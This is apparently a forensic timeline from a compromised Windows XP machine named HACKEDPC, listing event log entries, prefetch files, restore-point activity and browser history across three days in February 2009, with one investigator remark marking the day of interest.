02/17/09 7:48:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/17/09 7:48:24 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/17/09 7:48:31 created SMAX4PNP.EXE-1CC48B49.pf C:\WINDOWS\Prefetch\SMAX4PNP.EXE-1CC48B49.pf
02/17/09 7:48:38 created SGTRAY.EXE-31581176.pf C:\WINDOWS\Prefetch\SGTRAY.EXE-31581176.pf
02/17/09 7:48:41 created TFSWCTRL.EXE-2D67C816.pf C:\WINDOWS\Prefetch\TFSWCTRL.EXE-2D67C816.pf
02/17/09 7:48:49 created UDATERUI.EXE-173C3AC6.pf C:\WINDOWS\Prefetch\UDATERUI.EXE-173C3AC6.pf
02/17/09 7:48:51 created TRUEIMAGEMONITOR.EXE-08A65A75.pf C:\WINDOWS\Prefetch\TRUEIMAGEMONITOR.EXE-08A65A75.pf
02/17/09 7:48:54 created SHSTAT.EXE-34E0D8DA.pf C:\WINDOWS\Prefetch\SHSTAT.EXE-34E0D8DA.pf
02/17/09 7:49:03 created TIMOUNTERMONITOR.EXE-1A929E4A.pf C:\WINDOWS\Prefetch\TIMOUNTERMONITOR.EXE-1A929E4A.pf
02/17/09 7:49:09 created SBTRAYMANAGER.EXE-19E725FA.pf C:\WINDOWS\Prefetch\SBTRAYMANAGER.EXE-19E725FA.pf
02/17/09 7:49:14 created WEATHER.EXE-16549C68.pf C:\WINDOWS\Prefetch\WEATHER.EXE-16549C68.pf
02/17/09 7:50:36 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -
02/17/09 7:50:37 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -
02/17/09 7:50:50 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/17/09 7:55:28 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/17/09 8:02:01 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 30 minutes. -
02/17/09 8:02:01 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 29 minutes.;NtpClient has no source of accurate time. -
02/17/09 8:32:02 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 60 minutes. -
02/17/09 8:32:02 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 59 minutes.;NtpClient has no source of accurate time. -
02/17/09 9:29:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/17/09 9:29:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/17/09 9:32:05 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 120 minutes. -
02/17/09 9:32:05 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 119 minutes.;NtpClient has no source of accurate time. -
02/17/09 9:44:47 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/17/09 10:09:22 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/17/09 10:09:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/17/09 10:55:21 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/17/09 10:59:40 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/17/09 10:59:40 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/17/09 11:30:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/17/09 11:32:10 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 240 minutes. -
02/17/09 11:32:10 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 239 minutes.;NtpClient has no source of accurate time. -
02/17/09 12:21:05 accessed _REGISTRY_MACHINE_SECURITY C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/17/09 12:21:05 created _REGISTRY_MACHINE_SECURITY C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/17/09 12:21:05 modified _REGISTRY_MACHINE_SECURITY C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/17/09 12:21:05 written _REGISTRY_MACHINE_SECURITY C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP657\snapshot\_REGISTRY_MACHINE_SECURITY File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/17/09 12:22:27 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/17/09 15:33:38 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 480 minutes. -
02/17/09 15:33:38 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 479 minutes.;NtpClient has no source of accurate time. -
02/17/09 15:47:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/17/09 15:47:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/17/09 15:54:30 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/17/09 17:00:51 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -
02/18/09 7:45:53 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -
02/18/09 7:46:07 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -
02/18/09 7:46:07 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -
02/18/09 7:46:36 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/18/09 7:46:36 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/18/09 7:46:55 logged SysEvent.Evt EVENT ID: 14 EVENT TYPE: WARNING EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient was unable to find a domain controller to use as a time;source. NtpClient will try again in 15 minutes. -
02/18/09 7:46:55 logged SysEvent.Evt EVENT ID: 29 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The time provider NtpClient is configured to acquire time from one or more;time sources, however none of the sources are currently accessible. ;No attempt to contact a source will be made for 14 minutes.;NtpClient has no source of accurate time. -
02/18/09 7:47:13 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator. -
02/18/09 7:47:52 modified INDEX.BTR C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/18/09 7:47:52 written INDEX.BTR C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -
02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. -
02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/18/09 7:48:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -
02/18/09 7:48:59 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -
02/18/09 7:49:04 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/18/09 7:49:05 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/18/09 7:49:05 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/18/09 7:49:30 created WGATRAY.EXE-350D4455.pf C:\WINDOWS\Prefetch\WGATRAY.EXE-350D4455.pf
02/18/09 7:49:38 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/18/09 7:49:38 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/18/09 7:49:46 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/18/09 7:49:52 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/18/09 7:49:52 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/18/09 7:50:00 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/18/09 7:50:03 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
02/18/09 7:50:03 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/18/09 7:52:18 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -
02/18/09 7:52:19 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -
02/18/09 7:52:59 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/18/09 7:53:26 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -
02/18/09 7:58:25 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service was successfully sent a start control. -
02/18/09 7:58:25 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the running state. -
02/18/09 9:19:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Adobe LM Service service entered the stopped state. -
02/18/09 12:27:07 accessed INDEX.BTR C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/18/09 12:27:07 created INDEX.BTR C:\System Volume Information\_restore{46DE8921-1D39-44D2-A9E9-64119261F211}\RP658\snapshot\Repository\FS\INDEX.BTR File, Deleted, Overwritten, Archive, Compressed, Not Indexed
02/18/09 12:40:53 logged SysEvent.Evt EVENT ID: 1 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The System Restore filter encountered the unexpected error '0xC000000D' while processing the file 'Bootcode.ini' on the volume 'Disk0'. It has stopped monitoring the volume. -02/18/09 13:49:34 modified Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx02/18/09 13:49:34 written Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx02/18/09 13:49:44 accessed Misc.mbx C:\Program Files\Qualcomm\Eudora\Misc.mbx
02/18/09 16:58:35 logged SysEvent.Evt EVENT ID: 6006 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was stopped. -02/19/09 7:47:25 here’s the beginning of the day in question...starts with the system booting...
02/19/09 7:47:26 logged SysEvent.Evt EVENT ID: 9 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Broadcom 440x 10/100 Integrated Controller: Network controller configured for 100Mb full-duplex link. -02/19/09 7:47:40 logged SysEvent.Evt EVENT ID: 6009 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: Microsoft (R) Windows (R) 5.01. 2600 Service Pack 3 Uniprocessor Free. -02/19/09 7:47:40 logged SysEvent.Evt EVENT ID: 6005 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Event log service was started. -02/19/09 7:48:44 logged SysEvent.Evt EVENT ID: 11162 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The system failed to register host (A) resource records (RRs) for;network adapterwith settings:; Adapter Name : {A45FF4F5-BE0B-4156-B8E8-7CFCB02CE985}; Host Name : hackedpc; Primary Domain Suffix : ubw.ohio-state.edu; DNS server list :; 164.107.xxx.29, 128.146.1.7, 128.146.48.7; Sent update to server : 164.1.1.1; IP Address(es) :; 164.107.xxx.177;The reason the system could not register these RRs was because the;update request it sent to the DNS server timed out. The most likely;cause of this is that the DNS server authoritative for the name it;was attempting to register or update is not running at this time.;You can manually retry DNS registration of the network adapter and;its settings by typing "ipconfig /registerdns" at the command prompt.;If problems still persist, contact your DNS server or network systems;administrator.-02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Fax service was successfully sent a stop control. -02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service was successfully sent a start control. 
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Network Location Awareness (NLA) service entered the running state. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service was successfully sent a start control. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service was successfully sent a start control. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the running state. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service was successfully sent a start control. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Terminal Services service entered the running state. -
02/19/09 7:50:54 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Remote Access Connection Manager service entered the running state. -
02/19/09 7:51:15 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 7:51:15 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 7:51:22 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 7:51:29 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -
02/19/09 7:51:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -
02/19/09 7:51:36 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -
02/19/09 7:51:41 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service was successfully sent a start control. -
02/19/09 7:51:42 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The SSDP Discovery Service service entered the running state. -
02/19/09 7:52:51 accessed RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf
02/19/09 7:52:51 created RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf
02/19/09 7:52:51 written RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf
02/19/09 7:52:51 modified RUNDLL32.EXE-62AB2E98.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-62AB2E98.pf
02/19/09 7:53:06 accessed index.dat :Host: My Computer History\Daily -
02/19/09 7:54:01 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service was successfully sent a start control. -
02/19/09 7:54:02 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Background Intelligent Transfer Service service entered the running state. -
02/19/09 7:54:15 accessed index.dat :Host: pub.weatherbug.com History\Daily -
02/19/09 7:54:15 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/5436@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204& History\Daily -
02/19/09 7:54:22 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The DSproct service was successfully sent a start control. -
02/19/09 7:54:24 created smith.99999@advertising[1].txt advertising.com/ Cookies -
02/19/09 7:54:26 created smith.99999@advertising[1].txt advertising.com/ Cookies -
02/19/09 7:54:32 accessed index.dat :Host: deskwx.weatherbug.com History\Daily -
02/19/09 7:54:32 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1234959600&suns=1234998660&ut=1235048002&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1234961542&rnd=4827&&&&vcw=450&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=168&lvh=&wat=1234961185&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=0&n=506267455&alid=0&u=&LRR=&L3=OH History\Daily -
02/19/09 7:54:38 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/292@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=24.80&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=168&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=24.80&WO3=0&WO4=68.00&Z3=43204& History\Daily -
02/19/09 7:55:59 accessed RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf
02/19/09 7:55:59 created RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf
02/19/09 7:55:59 written RUNDLL32.EXE-4DEB4935.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-4DEB4935.pf
